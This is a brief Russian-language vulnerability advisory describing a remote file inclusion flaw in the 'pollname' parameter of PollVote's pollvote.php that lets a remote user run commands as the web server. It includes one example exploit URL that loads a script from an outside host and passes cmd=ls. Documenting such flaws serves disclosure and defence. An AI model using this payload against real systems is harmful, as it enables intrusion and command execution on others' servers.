Программа: PollVote

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной фильтрации входных данных в параметре «pollname» сценария «pollvote.php». Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные команды на целевой системе с привилегиями web сервера. 

Пример:

http://www.[host].com/[path]/pollvote.php? pollname=http://www.[host].com/CMD.gif?&cmd=ls

Оставить мнение